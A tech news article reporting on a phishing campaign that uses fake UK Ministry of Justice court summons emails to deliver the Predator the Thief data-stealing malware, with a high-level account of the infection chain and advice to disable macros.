• Contact Us
  • Login
Upgrade
Tech News Hero
Advertisement
  • Home
  • News
  • Gadgets
  • Social
  • Gaming
  • Mobile
  • PC
  • Internet
  • Security
  • Apps
No Result
View All Result
  • Home
  • News
  • Gadgets
  • Social
  • Gaming
  • Mobile
  • PC
  • Internet
  • Security
  • Apps
No Result
View All Result
Tech News Hero
No Result
View All Result
Home Security

Phishing campaign delivers data-stealing malware via fake court summons emails

by technewshero
November 6, 2019
in Security
0
Share on FacebookShare on Twitter
Why we’re still losing the fight against phishing attacks
Danny Palmer explains that it’s not fair to blame users for falling victim to attacks when employers aren’t doing enough to help. Read more: https://zd.net/31Oiisg

A newly uncovered hacking campaign is targeting employees in the insurance and retail industries with phishing emails, claiming to be from the Ministry of Justice, that infect the victim with information-stealing malware.

Uncovered by researchers at cybersecurity company Cofense, the phishing emails have the subject ‘Court’ and feature UK Ministry of Justice logos. They claim to provide information about ‘Your Subpoena’, and ask the victim to click a link because they’ve been ordered to attend a law court and have 14 days to comply. There’s no information about what the court case supposedly relates to.

If victims click though to the link, they’re directed to a cloud hosting provider which redirects them to a document containing Predator the Thief, a form of malware that’s commonly up for sale on underground hacking forums.

Predator the Thief can steal usernames, passwords, browser data and the contents of cryptocurrency wallets, as well as take photos using a webcam. The malware first emerged in July 2018.

SEE: A winning strategy for cybersecurity (ZDNet special report) | Download the report as a PDF (TechRepublic)  

The phishing emails use a number of layers to hide the malicious intention of the message from security software. The email contains a Google Docs link which, if clicked, automatically redirects the user to Microsoft OneDrive, which delivers a Microsoft Word document to the victim. As in many other phishing campaigns, the document asks users to enable macros; if they do, the malware is downloaded via PowerShell.

The malware then connects to a command-and-control server, and provides the attacker with a gateway to the infected system and the ability to secretly steal data. When the cyber criminals decide they have gathered all the data they need, Predator the Thief self-destructs, cleaning up any evidence that it was there in the first place.

Legal technicality

Shock tactics like telling a potential victim they have a court date is a regular trick used by cyber criminals, designed to scare people into clicking phishing links and downloading malware. However, there’s a prominent clue that all is not right with this message — and it’s not just the strange email address.

The message refers to a subpoena. The term is regularly used in the United States, but the UK court system hasn’t used ‘subpoena’ since 1999, when the relevant term was changed to ‘witness summons’.

SEE: Thousands of QNAP NAS devices have been infected with the QSnatch malware

The email’s phrasing therefore suggests that while the cyber criminals are using UK imagery in an attempt to dupe victims, they’re not familiar with the details of the local system.

To help protect against these kinds of attacks, researchers recommend that macros are disabled by default and that users are educated about the dangers of enabling them.

MORE ON CYBERCRIME

 

Previous Post

Disney Plus may show you some ads – but for a very good reason

Next Post

Twitter India Finds Itself in a Caste Controversy

technewshero

technewshero

Related Posts

2020 Shows the Danger of a Decapitated Cyber Regime
Security

2020 Shows the Danger of a Decapitated Cyber Regime

by technewshero
January 13, 2021
A ‘Bulletproof’ Criminal VPN Was Taken Down in a Global Sting
Security

A ‘Bulletproof’ Criminal VPN Was Taken Down in a Global Sting

by technewshero
January 14, 2021
The Worst Hacks of 2020, a Surreal Pandemic Year
Security

The Worst Hacks of 2020, a Surreal Pandemic Year

by technewshero
January 15, 2021
Security

How Your Digital Trails Wind Up in the Police’s Hands

by technewshero
December 31, 2020
How to Understand the Russia Hack Fallout
Security

How to Understand the Russia Hack Fallout

by technewshero
December 22, 2020
Next Post

Twitter India Finds Itself in a Caste Controversy

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Most Popular

Amazon eyes Zoox, Aurora goes back to school and Cabana hits the road – TechNewHero

Amazon eyes Zoox, Aurora goes back to school and Cabana hits the road – TechNewHero

December 15, 2020
Nvidia GeForce RTX 3070 gaming graphics card is a speedy compromise for $499

Nvidia GeForce RTX 3070 gaming graphics card is a speedy compromise for $499

January 14, 2021
Having iPhone issues? Here’s how to fix it yourself

Having iPhone issues? Here’s how to fix it yourself

January 12, 2021

Browse by Category

  • Apps
  • Gadgets
  • Gaming
  • Internet
  • Mobile
  • News
  • PC & Laptops
  • Security
  • Social
Tech News Hero

© 2020 Tech News Hero.

No Result
View All Result
  • Home
  • Landing Page
  • Buy JNews
  • Support Forum
  • Contact Us

© 2020 Tech News Hero.

Welcome Back!

Login to your account below

Forgotten Password?

Create New Account!

Fill the forms bellow to register

All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In
Are you sure want to unlock this post?
Unlock left : 0
Are you sure want to cancel subscription?